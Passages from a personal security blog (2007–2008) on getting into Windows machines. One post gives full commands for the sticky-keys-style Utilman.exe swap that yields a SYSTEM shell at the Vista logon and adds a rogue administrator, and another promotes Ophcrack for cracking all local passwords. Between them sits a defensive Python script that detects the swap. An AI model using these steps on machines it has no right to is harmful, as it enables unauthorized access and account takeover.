PaulSpoerry.com

You found me… insights on technology, philosophy, Windows, hacking and more.

Hack Vista – Create a new admin account

PaulSpoerry | August 3, 2008

Why hack Windows passwords when you can simply create yourself a new Administrator account?

In a previous post I showed how you can use an Ophcrack Live CD to crack Windows passwords in minutes. It works, I’ve done it before and it really works. The free, open source Ophcrack Live CD is a Windows account password cracking tool designed to help you recover lost Windows passwords. Quite a few people have sent me emails or chatted with me via my website saying “I forgot my password”, or “my kid locked himself out of his PC”. I’m unsure if that’s really the case or if they were just looking for a way to crack Windows passwords. However, if that is really the case there is potentially a much faster way to resolve your issue… just create a new Administrator account!

To create a new Administrator account you’ll want to grab a copy of Offensive Security’s BackTrack Live CD, which can be found here.

What is BackTrack?

BackTrack is the result of the merging of two Innovative Penetration Testing live Linux distributions – Whax and Auditor. BackTrack has been dubbed as the best Security Live CD today, and has been rated 1st in its category, and 32nd overall in Insecure.org. Based on SLAX (Slackware), BackTrack provides user modularity. This means the distribution can be easily customised by the user to include personal scripts, additional tools, customized kernels, etc.

BackTrack Terminal Window

Here’s a quick and dirty way to make a new user account.

Boot into BackTrack and open a shell prompt:

  • cd /mnt (change directory to mounted drives)
  • ls (get the list of mounted drives)
  • cd sda1 (sda1 is the main hard drive)
  • cd Windows/ (change to the windows directory)
  • cd System32/ (change to the system directory)
  • mv Utilman.exe Utilman.old (backup original file)
  • cp cmd.exe Utilman.exe (copy cmd.exe as utilman.exe)
  • reboot

Once rebooted, at the Vista logon screen, do the following:

  • Press Windows key + U to invoke Utility Manager (a.k.a. cmd.exe).
  • cmd.exe will spawn with ‘System’ privileges.
  • c:\>net user S00perAdmin mypassword /add
  • c:\>net localgroup administrators S00perAdmin /add
  • Reboot and log in with your newly added Admin account

There ya go… now instead of needing to “crack” your “lost” password you can simply create a new Administrator account, log in with that and then change the lost account’s password to what you want it to be.
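From the defender's side, the swap described above leaves recognizable traces on disk. As an added example (not part of the original post), this Python script checks a Windows System32 directory, for instance one mounted read-only from a live CD, for a Utilman.exe that is identical to cmd.exe and for a renamed leftover such as Utilman.old; the function names and the sample files are constructed for illustration.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256_of(path):
    """Hash a file in chunks so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()

def find_file(directory, name):
    """Case-insensitive lookup; NTFS names keep their case when mounted on Linux."""
    for entry in Path(directory).iterdir():
        if entry.is_file() and entry.name.lower() == name.lower():
            return entry
    return None

def check_utilman(system32):
    """Return a list of findings; an empty list means no trace of the swap."""
    findings = []
    utilman = find_file(system32, "Utilman.exe")
    cmd = find_file(system32, "cmd.exe")
    if utilman is None:
        findings.append("Utilman.exe is missing")
    elif cmd is not None and sha256_of(utilman) == sha256_of(cmd):
        findings.append("Utilman.exe is a byte-for-byte copy of cmd.exe")
    # A renamed original (e.g. Utilman.old) is the backup step from the procedure.
    for entry in sorted(Path(system32).iterdir()):
        if (entry.is_file() and entry.stem.lower() == "utilman"
                and entry.suffix.lower() != ".exe"):
            findings.append(f"renamed copy present: {entry.name}")
    return findings

def build_sample(directory, tampered):
    """Create constructed stand-in files (not real Windows binaries) for a demo."""
    base = Path(directory)
    (base / "cmd.exe").write_bytes(b"constructed cmd.exe bytes")
    if tampered:
        (base / "Utilman.old").write_bytes(b"constructed Utilman bytes")
        (base / "Utilman.exe").write_bytes(b"constructed cmd.exe bytes")
    else:
        (base / "Utilman.exe").write_bytes(b"constructed Utilman bytes")

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample(tmp, tampered=True)
        for finding in check_utilman(tmp):
            print("FINDING:", finding)
```

The hash comparison only catches an exact copy of the cmd.exe that sits in the same directory; comparing Utilman.exe against a known-good hash for the installed Windows build gives stronger assurance.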


Ophcrack Live CD – Crack Windows passwords in minutes

PaulSpoerry | January 9, 2007

The free, open source Ophcrack Live CD is a Windows account password cracking tool designed to help you recover lost Windows passwords.

After you download the 462 MB .iso and burn it to a CD, just restart your computer and boot up the Live CD. Once the CD boots, blamo… Ophcrack automatically loads and is on its way to cracking your password.

(screenshot of ophcrack on Linux cracking Windows passwords)

Features:

  • Runs on Windows, Linux and Mac OS X (intel).
  • Cracks LM and NTLM hashes.
  • Free tables available for alphanumeric LM hashes.
  • Loads hashes from local SAM, remote SAM.
  • Loads hashes from encrypted SAM recovered from a Windows partition, Vista included.

I’ve yet to try this live bootable version, but I used l0phtcrack (now LC5 and no longer produced since the company that made it was bought by Symantec) a few years ago and retrieved 99% of the passwords off a backup domain controller in something like 12 hours (using a not-so-powerful desktop to do the cracking).

Get ophcrack Live CD. FYI – you can still get l0phtcrack (aka LC5) from mirrors like sectools.org.

STUMBLEUPON UPDATE:

A couple people have asked if this really works. I just want to re-iterate that this DOES work. It requires physical access to the machine, but if you have physical access you can literally crack every password on a machine in a very short time. As I said above, I used it on a backup domain controller and in about 12 hours cracked every single password on the BDC.

Why crack passwords when you can just create a new Admin account?

Most people tell me they simply “lost” their password. If that’s the case you can use some free tools to create a new Administrator account. With this account you can simply change the existing account’s password, use the new Admin account, or… well… do anything you want. Read more in my article: Hack Vista – Create a new admin account

